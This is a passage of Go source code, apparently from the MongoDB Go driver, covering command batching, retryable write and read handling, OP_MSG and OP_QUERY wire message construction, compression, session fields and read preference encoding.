				// For client-side encryption, we want the batch to be split at 2 MiB instead of 16MiB.
				// If there's only one document in the batch, it can be up to 16MiB, so we set target batch size to
				// 2MiB but max document size to 16MiB. This will allow the AdvanceBatch call to create a batch
				// with a single large document.
				targetBatchSize = cryptMaxBsonObjectSize
			}

			err = op.Batches.AdvanceBatch(int(desc.MaxBatchCount), int(targetBatchSize), int(maxDocSize))
			if err != nil {
				// TODO(GODRIVER-982): Should we also be returning operationErr?
				return err
			}
		}

		// convert to wire message
		if len(scratch) > 0 {
			scratch = scratch[:0]
		}
		wm, startedInfo, err := op.createWireMessage(ctx, scratch, desc, conn)
		if err != nil {
			return err
		}

		// set extra data and send event if possible
		startedInfo.connID = conn.ID()
		startedInfo.cmdName = op.getCommandName(startedInfo.cmd)
		startedInfo.redacted = op.redactCommand(startedInfo.cmdName, startedInfo.cmd)
		op.publishStartedEvent(ctx, startedInfo)

		// get the moreToCome flag information before we compress
		moreToCome := wiremessage.IsMsgMoreToCome(wm)

		// compress wiremessage if allowed
		if compressor, ok := conn.(Compressor); ok && op.canCompress(startedInfo.cmdName) {
			wm, err = compressor.CompressWireMessage(wm, nil)
			if err != nil {
				return err
			}
		}

		finishedInfo := finishedInformation{
			cmdName:   startedInfo.cmdName,
			requestID: startedInfo.requestID,
			startTime: time.Now(),
			connID:    startedInfo.connID,
			redacted:  startedInfo.redacted,
		}

		// roundtrip using either the full roundTripper or a special one for when the moreToCome
		// flag is set
		var roundTrip = op.roundTrip
		if moreToCome {
			roundTrip = op.moreToComeRoundTrip
		}
		res, err = roundTrip(ctx, conn, wm)
		if ep, ok := srvr.(ErrorProcessor); ok {
			ep.ProcessError(err, conn)
		}

		finishedInfo.response = res
		finishedInfo.cmdErr = err
		op.publishFinishedEvent(ctx, finishedInfo)

		var perr error
		if op.ProcessResponseFn != nil {
			perr = op.ProcessResponseFn(res, srvr, desc.Server)
		}

		switch tt := err.(type) {
		case WriteCommandError:
			if e := err.(WriteCommandError); retryable && op.Type == Write && e.UnsupportedStorageEngine() {
				return ErrUnsupportedStorageEngine
			}

			connDesc := conn.Description()
			retryableErr := tt.Retryable(connDesc.WireVersion)
			preRetryWriteLabelVersion := connDesc.WireVersion != nil && connDesc.WireVersion.Max < 9
			inTransaction := !(op.Client.Committing || op.Client.Aborting) && op.Client.TransactionRunning()
			// If retry is enabled and the operation isn't in a transaction, add a RetryableWriteError label for
			// retryable errors from pre-4.4 servers
			if retryableErr && preRetryWriteLabelVersion && retryEnabled && !inTransaction {
				tt.Labels = append(tt.Labels, RetryableWriteError)
			}

			if retryable && retryableErr && retries != 0 {
				retries--
				original, err = err, nil
				conn.Close() // Avoid leaking the connection.
				srvr, err = op.selectServer(ctx)
				if err != nil {
					return original
				}
				conn, err = srvr.Connection(ctx)
				if err != nil || conn == nil || !op.retryable(conn.Description()) {
					if conn != nil {
						conn.Close()
					}
					return original
				}
				defer conn.Close() // Avoid leaking the new connection.
				if op.Client != nil && op.Client.Committing {
					// Apply majority write concern for retries
					op.Client.UpdateCommitTransactionWriteConcern()
					op.WriteConcern = op.Client.CurrentWc
				}
				continue
			}

			// Shift reported write-error indexes by the number of documents
			// already sent in earlier batches.
			if batching && len(tt.WriteErrors) > 0 && currIndex > 0 {
				for i := range tt.WriteErrors {
					tt.WriteErrors[i].Index += int64(currIndex)
				}
			}

			// If batching is enabled and either ordered is the default (which is true) or
			// explicitly set to true and we have write errors, return the errors.
			if batching && (op.Batches.Ordered == nil || *op.Batches.Ordered == true) && len(tt.WriteErrors) > 0 {
				return tt
			}
			if op.Client != nil && op.Client.Committing && tt.WriteConcernError != nil {
				// When running commitTransaction we return WriteConcernErrors as an Error.
				err := Error{
					Name:    tt.WriteConcernError.Name,
					Code:    int32(tt.WriteConcernError.Code),
					Message: tt.WriteConcernError.Message,
					Labels:  tt.Labels,
				}
				// The UnknownTransactionCommitResult label is added to all writeConcernErrors besides unknownReplWriteConcernCode
				// and unsatisfiableWriteConcernCode
				if err.Code != unknownReplWriteConcernCode && err.Code != unsatisfiableWriteConcernCode {
					err.Labels = append(err.Labels, UnknownTransactionCommitResult)
				}
				if retryableErr && retryEnabled {
					err.Labels = append(err.Labels, RetryableWriteError)
				}
				return err
			}
			operationErr.WriteConcernError = tt.WriteConcernError
			operationErr.WriteErrors = append(operationErr.WriteErrors, tt.WriteErrors...)
			operationErr.Labels = tt.Labels
		case Error:
			if tt.HasErrorLabel(TransientTransactionError) || tt.HasErrorLabel(UnknownTransactionCommitResult) {
				op.Client.ClearPinnedServer()
			}

			if e := err.(Error); retryable && op.Type == Write && e.UnsupportedStorageEngine() {
				return ErrUnsupportedStorageEngine
			}

			connDesc := conn.Description()
			var retryableErr bool
			if op.Type == Write {
				retryableErr = tt.RetryableWrite(connDesc.WireVersion)
				preRetryWriteLabelVersion := connDesc.WireVersion != nil && connDesc.WireVersion.Max < 9
				inTransaction := !(op.Client.Committing || op.Client.Aborting) && op.Client.TransactionRunning()
				// If retryWrites is enabled and the operation isn't in a transaction, add a RetryableWriteError label
				// for network errors and retryable errors from pre-4.4 servers
				if retryEnabled && !inTransaction &&
					(tt.HasErrorLabel(NetworkError) || (retryableErr && preRetryWriteLabelVersion)) {
					tt.Labels = append(tt.Labels, RetryableWriteError)
				}
			} else {
				retryableErr = tt.RetryableRead()
			}

			if retryable && retryableErr && retries != 0 {
				retries--
				original, err = err, nil
				conn.Close() // Avoid leaking the connection.
				srvr, err = op.selectServer(ctx)
				if err != nil {
					return original
				}
				conn, err = srvr.Connection(ctx)
				if err != nil || conn == nil || !op.retryable(conn.Description()) {
					if conn != nil {
						conn.Close()
					}
					return original
				}
				defer conn.Close() // Avoid leaking the new connection.
				if op.Client != nil && op.Client.Committing {
					// Apply majority write concern for retries
					op.Client.UpdateCommitTransactionWriteConcern()
					op.WriteConcern = op.Client.CurrentWc
				}
				continue
			}

			if op.Client != nil && op.Client.Committing && (retryableErr || tt.Code == 50) {
				// If we got a retryable error or MaxTimeMSExpired error, we add UnknownTransactionCommitResult.
				tt.Labels = append(tt.Labels, UnknownTransactionCommitResult)
			}
			return tt
		case nil:
			if moreToCome {
				return ErrUnacknowledgedWrite
			}
			if perr != nil {
				return perr
			}
		default:
			return err
		}

		// More documents remain: reset per-command retry state, record how many
		// documents have been sent so far, and loop for the next batch.
		if batching && len(op.Batches.Documents) > 0 {
			if retryable && op.Client != nil && op.RetryMode != nil {
				if *op.RetryMode > RetryNone {
					op.Client.IncrementTxnNumber()
				}
				if *op.RetryMode == RetryOncePerCommand {
					retries = 1
				}
			}
			currIndex += len(op.Batches.Current)
			op.Batches.ClearBatch()
			continue
		}
		break
	}
	if len(operationErr.WriteErrors) > 0 || operationErr.WriteConcernError != nil {
		return operationErr
	}
	return nil
}
// Retryable writes are supported if the server supports sessions, the operation is not
// within a transaction, and the write is acknowledged
func (op Operation) retryable(desc description.Server) bool {
	switch op.Type {
	case Write:
		// Sessions that are committing or aborting a transaction are always
		// treated as retryable.
		if op.Client != nil && (op.Client.Committing || op.Client.Aborting) {
			return true
		}
		if desc.SupportsRetryWrites() &&
			desc.WireVersion != nil && desc.WireVersion.Max >= 6 &&
			op.Client != nil && !(op.Client.TransactionInProgress() || op.Client.TransactionStarting()) &&
			writeconcern.AckWrite(op.WriteConcern) {
			return true
		}
	case Read:
		if op.Client != nil && (op.Client.Committing || op.Client.Aborting) {
			return true
		}
		// Reads require wire version 6+ and must not be inside a running or
		// starting transaction; unlike writes, no session is required.
		if desc.WireVersion != nil && desc.WireVersion.Max >= 6 &&
			(op.Client == nil || !(op.Client.TransactionInProgress() || op.Client.TransactionStarting())) {
			return true
		}
	}
	return false
}
// roundTrip writes a wiremessage to the connection and then reads a wiremessage. The wm parameter
// is reused when reading the wiremessage.
func (op Operation) roundTrip(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
	err := conn.WriteWireMessage(ctx, wm)
	if err != nil {
		// A network error on the write marks the session dirty and, when a
		// transaction is involved, attaches the appropriate transaction label.
		labels := []string{NetworkError}
		if op.Client != nil {
			op.Client.MarkDirty()
		}
		if op.Client != nil && op.Client.TransactionRunning() && !op.Client.Committing {
			labels = append(labels, TransientTransactionError)
		}
		if op.Client != nil && op.Client.Committing {
			labels = append(labels, UnknownTransactionCommitResult)
		}
		return nil, Error{Message: err.Error(), Labels: labels, Wrapped: err}
	}

	return op.readWireMessage(ctx, conn, wm)
}
// readWireMessage reads a server response from conn (reusing wm's backing array),
// applies streaming state, decompresses and decodes the response, and updates
// cluster/operation times and the session recovery token before returning.
func (op Operation) readWireMessage(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
	var err error
	wm, err = conn.ReadWireMessage(ctx, wm[:0])
	if err != nil {
		// Same network-error labeling as the write path: mark the session
		// dirty and attach the relevant transaction label.
		labels := []string{NetworkError}
		if op.Client != nil {
			op.Client.MarkDirty()
		}
		if op.Client != nil && op.Client.TransactionRunning() && !op.Client.Committing {
			labels = append(labels, TransientTransactionError)
		}
		if op.Client != nil && op.Client.Committing {
			labels = append(labels, UnknownTransactionCommitResult)
		}
		return nil, Error{Message: err.Error(), Labels: labels, Wrapped: err}
	}

	// If we're using a streamable connection, we set its streaming state based on the moreToCome flag in the server
	// response.
	if streamer, ok := conn.(StreamerConnection); ok {
		streamer.SetStreaming(wiremessage.IsMsgMoreToCome(wm))
	}

	// decompress wiremessage
	wm, err = op.decompressWireMessage(wm)
	if err != nil {
		return nil, err
	}

	// decode
	res, err := op.decodeResult(wm)
	// Update cluster/operation time and recovery tokens before handling the error to ensure we're properly updating
	// everything.
	op.updateClusterTimes(res)
	op.updateOperationTime(res)
	// NOTE(review): op.Client may be nil here; this relies on UpdateRecoveryToken
	// being safe on a nil receiver — confirm in the session package.
	op.Client.UpdateRecoveryToken(bson.Raw(res))
	if err != nil {
		return res, err
	}

	// If there is no error, automatically attempt to decrypt all results if client side encryption is enabled.
	if op.Crypt != nil {
		return op.Crypt.Decrypt(ctx, res)
	}
	return res, nil
}
// moreToComeRoundTrip writes a wiremessage to the provided connection. This is used when an OP_MSG is
// being sent with the moreToCome bit set, so no server reply is read; a synthetic
// {"ok": 1} document is returned instead.
func (op *Operation) moreToComeRoundTrip(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
	okResponse := bsoncore.BuildDocument(nil, bsoncore.AppendInt32Element(nil, "ok", 1))

	writeErr := conn.WriteWireMessage(ctx, wm)
	if writeErr == nil {
		return okResponse, nil
	}

	if op.Client != nil {
		op.Client.MarkDirty()
	}
	wrapped := Error{
		Message: writeErr.Error(),
		Labels:  []string{TransientTransactionError, NetworkError},
		Wrapped: writeErr,
	}
	return okResponse, wrapped
}
// decompressWireMessage handles decompressing a wiremessage. If the wiremessage
// is not compressed, this method will return the wiremessage.
func (Operation) decompressWireMessage(wm []byte) ([]byte, error) {
	// read the header and ensure this is a compressed wire message
	length, reqid, respto, opcode, rem, ok := wiremessage.ReadHeader(wm)
	if !ok || len(wm) < int(length) {
		return nil, errors.New("malformed wire message: insufficient bytes")
	}
	if opcode != wiremessage.OpCompressed {
		return wm, nil
	}
	// get the original opcode and uncompressed size
	opcode, rem, ok = wiremessage.ReadCompressedOriginalOpCode(rem)
	if !ok {
		return nil, errors.New("malformed OP_COMPRESSED: missing original opcode")
	}
	uncompressedSize, rem, ok := wiremessage.ReadCompressedUncompressedSize(rem)
	if !ok {
		return nil, errors.New("malformed OP_COMPRESSED: missing uncompressed size")
	}
	// get the compressor ID and decompress the message
	compressorID, rem, ok := wiremessage.ReadCompressedCompressorID(rem)
	if !ok {
		return nil, errors.New("malformed OP_COMPRESSED: missing compressor ID")
	}
	compressedSize := length - 25 // header (16) + original opcode (4) + uncompressed size (4) + compressor ID (1)
	// return the original wiremessage
	msg, rem, ok := wiremessage.ReadCompressedCompressedMessage(rem, compressedSize)
	if !ok {
		return nil, errors.New("malformed OP_COMPRESSED: insufficient bytes for compressed wiremessage")
	}

	// Rebuild a standard wire-message header in front of the decompressed body,
	// preserving the original request/response IDs and the pre-compression opcode.
	header := make([]byte, 0, uncompressedSize+16)
	header = wiremessage.AppendHeader(header, uncompressedSize+16, reqid, respto, opcode)
	opts := CompressionOpts{
		Compressor:       compressorID,
		UncompressedSize: uncompressedSize,
	}
	uncompressed, err := DecompressPayload(msg, opts)
	if err != nil {
		return nil, err
	}

	return append(header, uncompressed...), nil
}
// createWireMessage builds the wire message for this operation, using OP_MSG when
// the server's wire version supports it and falling back to legacy OP_QUERY otherwise.
func (op Operation) createWireMessage(ctx context.Context, dst []byte,
	desc description.SelectedServer, conn Connection) ([]byte, startedInformation, error) {

	if desc.WireVersion != nil && desc.WireVersion.Max >= wiremessage.OpmsgWireVersion {
		return op.createMsgWireMessage(ctx, dst, desc, conn)
	}
	return op.createQueryWireMessage(dst, desc)
}
// addBatchArray appends the current batch of documents to dst as a BSON array
// element keyed by op.Batches.Identifier, with elements keyed "0", "1", ....
func (op Operation) addBatchArray(dst []byte) []byte {
	arrIdx, dst := bsoncore.AppendArrayElementStart(dst, op.Batches.Identifier)
	for n, doc := range op.Batches.Current {
		dst = bsoncore.AppendDocumentElement(dst, strconv.Itoa(n), doc)
	}
	dst, _ = bsoncore.AppendArrayEnd(dst, arrIdx)
	return dst
}
// createQueryWireMessage encodes the operation as a legacy OP_QUERY against the
// database's "$cmd" collection, for servers that do not support OP_MSG.
func (op Operation) createQueryWireMessage(dst []byte, desc description.SelectedServer) ([]byte, startedInformation, error) {
	var info startedInformation
	flags := op.slaveOK(desc)
	var wmindex int32
	info.requestID = wiremessage.NextRequestID()
	wmindex, dst = wiremessage.AppendHeaderStart(dst, info.requestID, 0, wiremessage.OpQuery)
	dst = wiremessage.AppendQueryFlags(dst, flags)
	// FullCollectionName
	dst = append(dst, op.Database...)
	dst = append(dst, dollarCmd[:]...)
	dst = append(dst, 0x00)
	dst = wiremessage.AppendQueryNumberToSkip(dst, 0)
	dst = wiremessage.AppendQueryNumberToReturn(dst, -1)

	wrapper := int32(-1)
	rp, err := op.createReadPref(desc.Server.Kind, desc.Kind, true)
	if err != nil {
		return dst, info, err
	}
	// When a read preference is present the command is wrapped as
	// {$query: <cmd>, $readPreference: <rp>}.
	if len(rp) > 0 {
		wrapper, dst = bsoncore.AppendDocumentStart(dst)
		dst = bsoncore.AppendHeader(dst, bsontype.EmbeddedDocument, "$query")
	}
	idx, dst := bsoncore.AppendDocumentStart(dst)
	dst, err = op.CommandFn(dst, desc)
	if err != nil {
		return dst, info, err
	}

	if op.Batches != nil && len(op.Batches.Current) > 0 {
		dst = op.addBatchArray(dst)
	}

	dst, err = op.addReadConcern(dst, desc)
	if err != nil {
		return dst, info, err
	}

	dst, err = op.addWriteConcern(dst, desc)
	if err != nil {
		return dst, info, err
	}

	dst, err = op.addSession(dst, desc)
	if err != nil {
		return dst, info, err
	}

	dst = op.addClusterTime(dst, desc)

	dst, _ = bsoncore.AppendDocumentEnd(dst, idx)
	// Command monitoring only reports the document inside $query
	info.cmd = dst[idx:]

	if len(rp) > 0 {
		var err error
		dst = bsoncore.AppendDocumentElement(dst, "$readPreference", rp)
		dst, err = bsoncore.AppendDocumentEnd(dst, wrapper)
		if err != nil {
			return dst, info, err
		}
	}

	return bsoncore.UpdateLength(dst, wmindex, int32(len(dst[wmindex:]))), info, nil
}
// createMsgWireMessage encodes the operation as an OP_MSG wire message, optionally
// attaching the current batch of documents as a type-1 document sequence section.
func (op Operation) createMsgWireMessage(ctx context.Context, dst []byte, desc description.SelectedServer,
	conn Connection) ([]byte, startedInformation, error) {

	var info startedInformation
	var flags wiremessage.MsgFlag
	var wmindex int32
	// We set the MoreToCome bit if we have a write concern, it's unacknowledged, and we either
	// aren't batching or we are encoding the last batch.
	if op.WriteConcern != nil && !writeconcern.AckWrite(op.WriteConcern) && (op.Batches == nil || len(op.Batches.Documents) == 0) {
		flags = wiremessage.MoreToCome
	}
	// Set the ExhaustAllowed flag if the connection supports streaming. This will tell the server that it can
	// respond with the MoreToCome flag and then stream responses over this connection.
	if streamer, ok := conn.(StreamerConnection); ok && streamer.SupportsStreaming() {
		flags |= wiremessage.ExhaustAllowed
	}

	info.requestID = wiremessage.NextRequestID()
	wmindex, dst = wiremessage.AppendHeaderStart(dst, info.requestID, 0, wiremessage.OpMsg)
	dst = wiremessage.AppendMsgFlags(dst, flags)
	// Body
	dst = wiremessage.AppendMsgSectionType(dst, wiremessage.SingleDocument)

	idx, dst := bsoncore.AppendDocumentStart(dst)

	dst, err := op.addCommandFields(ctx, dst, desc)
	if err != nil {
		return dst, info, err
	}

	dst, err = op.addReadConcern(dst, desc)
	if err != nil {
		return dst, info, err
	}
	dst, err = op.addWriteConcern(dst, desc)
	if err != nil {
		return dst, info, err
	}
	dst, err = op.addSession(dst, desc)
	if err != nil {
		return dst, info, err
	}

	dst = op.addClusterTime(dst, desc)

	dst = bsoncore.AppendStringElement(dst, "$db", op.Database)
	rp, err := op.createReadPref(desc.Server.Kind, desc.Kind, false)
	if err != nil {
		return dst, info, err
	}
	if len(rp) > 0 {
		dst = bsoncore.AppendDocumentElement(dst, "$readPreference", rp)
	}

	dst, _ = bsoncore.AppendDocumentEnd(dst, idx)
	// The command document for monitoring shouldn't include the type 1 payload as a document sequence
	info.cmd = dst[idx:]

	// add batch as a document sequence if auto encryption is not enabled
	// if auto encryption is enabled, the batch will already be an array in the command document
	if !op.shouldEncrypt() && op.Batches != nil && len(op.Batches.Current) > 0 {
		info.documentSequenceIncluded = true
		dst = wiremessage.AppendMsgSectionType(dst, wiremessage.DocumentSequence)
		idx, dst = bsoncore.ReserveLength(dst)

		dst = append(dst, op.Batches.Identifier...)
		dst = append(dst, 0x00)

		for _, doc := range op.Batches.Current {
			dst = append(dst, doc...)
		}

		dst = bsoncore.UpdateLength(dst, idx, int32(len(dst[idx:])))
	}

	return bsoncore.UpdateLength(dst, wmindex, int32(len(dst[wmindex:]))), info, nil
}
// addCommandFields adds the fields for a command to the wire message in dst. This assumes that the start of the document
// has already been added and does not add the final 0 byte.
//
// When auto-encryption is enabled, the command is first marshalled into a temporary
// document, encrypted via op.Crypt, and the encrypted body is spliced into dst.
func (op Operation) addCommandFields(ctx context.Context, dst []byte, desc description.SelectedServer) ([]byte, error) {
	if !op.shouldEncrypt() {
		return op.CommandFn(dst, desc)
	}

	if desc.WireVersion.Max < cryptMinWireVersion {
		return dst, errors.New("auto-encryption requires a MongoDB version of 4.2")
	}

	// create temporary command document
	cidx, cmdDst := bsoncore.AppendDocumentStart(nil)
	var err error
	cmdDst, err = op.CommandFn(cmdDst, desc)
	if err != nil {
		return dst, err
	}
	// use a BSON array instead of a type 1 payload because mongocryptd will convert to arrays regardless
	if op.Batches != nil && len(op.Batches.Current) > 0 {
		cmdDst = op.addBatchArray(cmdDst)
	}
	cmdDst, _ = bsoncore.AppendDocumentEnd(cmdDst, cidx)

	// encrypt the command
	encrypted, err := op.Crypt.Encrypt(ctx, op.Database, cmdDst)
	if err != nil {
		return dst, err
	}
	// append encrypted command to original destination, removing the first 4 bytes (length) and final byte (terminator)
	dst = append(dst, encrypted[4:len(encrypted)-1]...)
	return dst, nil
}
// addReadConcern appends the readConcern document to the command when applicable,
// augmenting it with afterClusterTime for causally-consistent sessions.
func (op Operation) addReadConcern(dst []byte, desc description.SelectedServer) ([]byte, error) {
	if op.MinimumReadConcernWireVersion > 0 && (desc.WireVersion == nil || !desc.WireVersion.Includes(op.MinimumReadConcernWireVersion)) {
		return dst, nil
	}
	rc := op.ReadConcern
	client := op.Client
	// Starting transaction's read concern overrides all others
	if client != nil && client.TransactionStarting() && client.CurrentRc != nil {
		rc = client.CurrentRc
	}

	// start transaction must append afterclustertime IF causally consistent and operation time exists
	if rc == nil && client != nil && client.TransactionStarting() && client.Consistent && client.OperationTime != nil {
		rc = readconcern.New()
	}

	if rc == nil {
		return dst, nil
	}

	_, data, err := rc.MarshalBSONValue() // always returns a document
	if err != nil {
		return dst, err
	}

	if description.SessionsSupported(desc.WireVersion) && client != nil && client.Consistent && client.OperationTime != nil {
		data = data[:len(data)-1] // remove the null byte
		data = bsoncore.AppendTimestampElement(data, "afterClusterTime", client.OperationTime.T, client.OperationTime.I)
		data, _ = bsoncore.AppendDocumentEnd(data, 0)
	}

	// An empty read concern document is omitted entirely.
	if len(data) == bsoncore.EmptyDocumentLength {
		return dst, nil
	}

	return bsoncore.AppendDocumentElement(dst, "readConcern", data), nil
}
// addWriteConcern appends the writeConcern element to the command when one is set.
// An empty write concern (writeconcern.ErrEmptyWriteConcern) is silently omitted.
func (op Operation) addWriteConcern(dst []byte, desc description.SelectedServer) ([]byte, error) {
	if op.MinimumWriteConcernWireVersion > 0 && (desc.WireVersion == nil || !desc.WireVersion.Includes(op.MinimumWriteConcernWireVersion)) {
		return dst, nil
	}
	wc := op.WriteConcern
	if wc == nil {
		return dst, nil
	}

	t, data, err := wc.MarshalBSONValue()
	if err == writeconcern.ErrEmptyWriteConcern {
		return dst, nil
	}
	if err != nil {
		return dst, err
	}

	return append(bsoncore.AppendHeader(dst, t, "writeConcern"), data...), nil
}
// addSession appends session-related fields (lsid, txnNumber, startTransaction,
// autocommit) to the command when a session is in use and the server supports sessions.
func (op Operation) addSession(dst []byte, desc description.SelectedServer) ([]byte, error) {
	client := op.Client
	if client == nil || !description.SessionsSupported(desc.WireVersion) || desc.SessionTimeoutMinutes == 0 {
		return dst, nil
	}
	if err := client.UpdateUseTime(); err != nil {
		return dst, err
	}
	dst = bsoncore.AppendDocumentElement(dst, "lsid", client.SessionID)

	// txnNumber is appended at most once: either for a retryable write or for a
	// running/retried transaction.
	var addedTxnNumber bool
	if op.Type == Write && client.RetryWrite {
		addedTxnNumber = true
		dst = bsoncore.AppendInt64Element(dst, "txnNumber", op.Client.TxnNumber)
	}
	if client.TransactionRunning() || client.RetryingCommit {
		if !addedTxnNumber {
			dst = bsoncore.AppendInt64Element(dst, "txnNumber", op.Client.TxnNumber)
		}
		if client.TransactionStarting() {
			dst = bsoncore.AppendBooleanElement(dst, "startTransaction", true)
		}
		dst = bsoncore.AppendBooleanElement(dst, "autocommit", false)
	}

	client.ApplyCommand(desc.Server)

	return dst, nil
}
// addClusterTime appends a "$clusterTime" element to dst, using the greater of
// the cluster clock's and the session's cluster times. Returns dst unchanged
// when sessions are unsupported or no cluster time is available.
func (op Operation) addClusterTime(dst []byte, desc description.SelectedServer) []byte {
client, clock := op.Client, op.Clock
if (clock == nil && client == nil) || !description.SessionsSupported(desc.WireVersion) {
return dst
}
// NOTE(review): clock may be nil here when only client is non-nil — this
// presumes GetClusterTime tolerates a nil receiver; confirm against the
// clock type's implementation.
clusterTime := clock.GetClusterTime()
if client != nil {
clusterTime = session.MaxClusterTime(clusterTime, client.ClusterTime)
}
if clusterTime == nil {
return dst
}
val, err := clusterTime.LookupErr("$clusterTime")
if err != nil {
return dst
}
// Append the raw looked-up value under the "$clusterTime" key.
return append(bsoncore.AppendHeader(dst, val.Type, "$clusterTime"), val.Value...)
// return bsoncore.AppendDocumentElement(dst, "$clusterTime", clusterTime)
}
// updateClusterTimes propagates the $clusterTime reported in a server response
// to both the operation's session and its cluster clock. Errors from the
// session's AdvanceClusterTime are deliberately discarded because nothing
// upstream consumes them.
func (op Operation) updateClusterTimes(response bsoncore.Document) {
	value, lookupErr := response.LookupErr("$clusterTime")
	if lookupErr != nil {
		// The server did not include a cluster time.
		return
	}

	ctDoc := bsoncore.BuildDocumentFromElements(nil, bsoncore.AppendValueElement(nil, "$clusterTime", value))

	if sess := op.Client; sess != nil {
		_ = sess.AdvanceClusterTime(bson.Raw(ctDoc))
	}
	if clock := op.Clock; clock != nil {
		clock.AdvanceClusterTime(bson.Raw(ctDoc))
	}
}
// updateOperationTime advances the session's operation time from the
// "operationTime" field of a server response, when both are present. The
// error from AdvanceOperationTime is discarded because callers have no use
// for it.
func (op Operation) updateOperationTime(response bsoncore.Document) {
	sess := op.Client
	if sess == nil {
		return
	}

	elem, lookupErr := response.LookupErr("operationTime")
	if lookupErr != nil {
		// The server did not include an operation time.
		return
	}

	t, i := elem.Timestamp()
	_ = sess.AdvanceOperationTime(&primitive.Timestamp{T: t, I: i})
}
// getReadPrefBasedOnTransaction resolves the effective read preference for
// this operation. Inside a running transaction the transaction's read
// preference takes priority and must be primary (except while the
// transaction is still starting); otherwise the operation's own read
// preference applies.
func (op Operation) getReadPrefBasedOnTransaction() (*readpref.ReadPref, error) {
	if op.Client == nil || !op.Client.TransactionRunning() {
		return op.ReadPreference, nil
	}

	rp := op.Client.CurrentRp
	if rp != nil && !op.Client.TransactionStarting() && rp.Mode() != readpref.PrimaryMode {
		// Reads in a transaction must target the primary.
		return nil, ErrNonPrimaryReadPref
	}
	return rp, nil
}
// createReadPref builds the $readPreference document to send for this
// operation, or returns (nil, nil) when no read preference should be sent.
func (op Operation) createReadPref(serverKind description.ServerKind, topologyKind description.TopologyKind, isOpQuery bool) (bsoncore.Document, error) {
if serverKind == description.Standalone || (isOpQuery && serverKind != description.Mongos) || op.Type == Write {
// Don't send read preference for non-mongos when using OP_QUERY or for all standalones
return nil, nil
}
idx, doc := bsoncore.AppendDocumentStart(nil)
rp, err := op.getReadPrefBasedOnTransaction()
if err != nil {
return nil, err
}
if rp == nil {
// With no explicit preference, direct (single-topology) connections to a
// non-mongos server are upgraded to primaryPreferred.
if topologyKind == description.Single && serverKind != description.Mongos {
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
return nil, nil
}
switch rp.Mode() {
case readpref.PrimaryMode:
if serverKind == description.Mongos {
// Primary is the mongos default; no document necessary.
return nil, nil
}
if topologyKind == description.Single {
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
doc = bsoncore.AppendStringElement(doc, "mode", "primary")
case readpref.PrimaryPreferredMode:
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
case readpref.SecondaryPreferredMode:
_, ok := rp.MaxStaleness()
// A bare secondaryPreferred sent via OP_QUERY to mongos (no max
// staleness, tags, or hedge) needs no explicit document.
if serverKind == description.Mongos && isOpQuery && !ok && len(rp.TagSets()) == 0 && rp.HedgeEnabled() == nil {
return nil, nil
}
doc = bsoncore.AppendStringElement(doc, "mode", "secondaryPreferred")
case readpref.SecondaryMode:
doc = bsoncore.AppendStringElement(doc, "mode", "secondary")
case readpref.NearestMode:
doc = bsoncore.AppendStringElement(doc, "mode", "nearest")
}
// Empty tag sets are skipped; each remaining set becomes one document in
// the "tags" array.
sets := make([]bsoncore.Document, 0, len(rp.TagSets()))
for _, ts := range rp.TagSets() {
if len(ts) == 0 {
continue
}
i, set := bsoncore.AppendDocumentStart(nil)
for _, t := range ts {
set = bsoncore.AppendStringElement(set, t.Name, t.Value)
}
set, _ = bsoncore.AppendDocumentEnd(set, i)
sets = append(sets, set)
}
if len(sets) > 0 {
var aidx int32
aidx, doc = bsoncore.AppendArrayElementStart(doc, "tags")
for i, set := range sets {
doc = bsoncore.AppendDocumentElement(doc, strconv.Itoa(i), set)
}
doc, _ = bsoncore.AppendArrayEnd(doc, aidx)
}
if d, ok := rp.MaxStaleness(); ok {
doc = bsoncore.AppendInt32Element(doc, "maxStalenessSeconds", int32(d.Seconds()))
}
if hedgeEnabled := rp.HedgeEnabled(); hedgeEnabled != nil {
var hedgeIdx int32
hedgeIdx, doc = bsoncore.AppendDocumentElementStart(doc, "hedge")
doc = bsoncore.AppendBooleanElement(doc, "enabled", *hedgeEnabled)
doc, err = bsoncore.AppendDocumentEnd(doc, hedgeIdx)
if err != nil {
return nil, fmt.Errorf("error creating hedge document: %v", err)
}
}
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
// slaveOK computes the OP_QUERY slaveOK flag: set when talking to a
// single-topology non-mongos server, or when the operation's read preference
// is anything other than primary.
func (op Operation) slaveOK(desc description.SelectedServer) wiremessage.QueryFlag {
	if desc.Kind == description.Single && desc.Server.Kind != description.Mongos {
		return wiremessage.SlaveOK
	}

	rp := op.ReadPreference
	if rp != nil && rp.Mode() != readpref.PrimaryMode {
		return wiremessage.SlaveOK
	}
	return 0
}
// canCompress reports whether the given command may be sent compressed.
// Handshake, authentication, and user-management commands must always go
// uncompressed.
func (Operation) canCompress(cmd string) bool {
	switch cmd {
	case "isMaster", "saslStart", "saslContinue", "getnonce", "authenticate",
		"createUser", "updateUser", "copydbSaslStart", "copydbgetnonce", "copydb":
		return false
	default:
		return true
	}
}
// decodeOpReply extracts the necessary information from an OP_REPLY wire message.
// includesHeader: specifies whether or not wm includes the message header
// Returns the decoded OP_REPLY. If the err field of the returned opReply is non-nil, an error occurred while decoding
// or validating the response and the other fields are undefined.
func (Operation) decodeOpReply(wm []byte, includesHeader bool) opReply {
	var reply opReply
	var ok bool

	if includesHeader {
		wmLength := len(wm)
		var length int32
		var opcode wiremessage.OpCode
		length, _, _, opcode, wm, ok = wiremessage.ReadHeader(wm)
		if !ok || int(length) > wmLength {
			reply.err = errors.New("malformed wire message: insufficient bytes")
			return reply
		}
		if opcode != wiremessage.OpReply {
			reply.err = errors.New("malformed wire message: incorrect opcode")
			return reply
		}
	}

	reply.responseFlags, wm, ok = wiremessage.ReadReplyFlags(wm)
	if !ok {
		reply.err = errors.New("malformed OP_REPLY: missing flags")
		return reply
	}
	reply.cursorID, wm, ok = wiremessage.ReadReplyCursorID(wm)
	if !ok {
		reply.err = errors.New("malformed OP_REPLY: missing cursorID")
		return reply
	}
	reply.startingFrom, wm, ok = wiremessage.ReadReplyStartingFrom(wm)
	if !ok {
		reply.err = errors.New("malformed OP_REPLY: missing startingFrom")
		return reply
	}
